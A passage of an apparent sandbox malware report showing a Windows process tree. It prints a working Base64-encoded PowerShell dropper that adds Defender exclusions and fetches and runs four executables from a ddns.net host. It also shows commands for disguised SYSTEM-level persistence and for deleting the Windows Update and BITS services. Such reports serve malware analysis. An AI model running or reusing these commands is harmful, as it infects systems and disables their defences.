"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
8⤵
- Suspicious use of SetThreadContext
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 48
9⤵
- Program crash
PID:2000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
9⤵
PID:1712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
11⤵
PID:468

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
11⤵
PID:1868

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
11⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
11⤵
PID:1108

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1760

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 96
9⤵
- Loads dropped DLL
- Program crash
PID:1364

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 48
6⤵
- Program crash
PID:1748

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 96
6⤵
- Loads dropped DLL
- Program crash
PID:1996

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1544

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:1748

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 48
3⤵
- Program crash
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:432

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1560

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1176

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1952

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:808

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1776

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1192

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1780

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:568

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1236

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1868

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1548

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1620

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:316

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1116

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1188

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1144

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1748

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1404

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1348

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1520

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1388

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:936

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:604

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1624

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1148

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1088

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1964

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1116

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1648

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1824

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:932

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1896

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1868

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe ovyftblehadxh
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:520

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
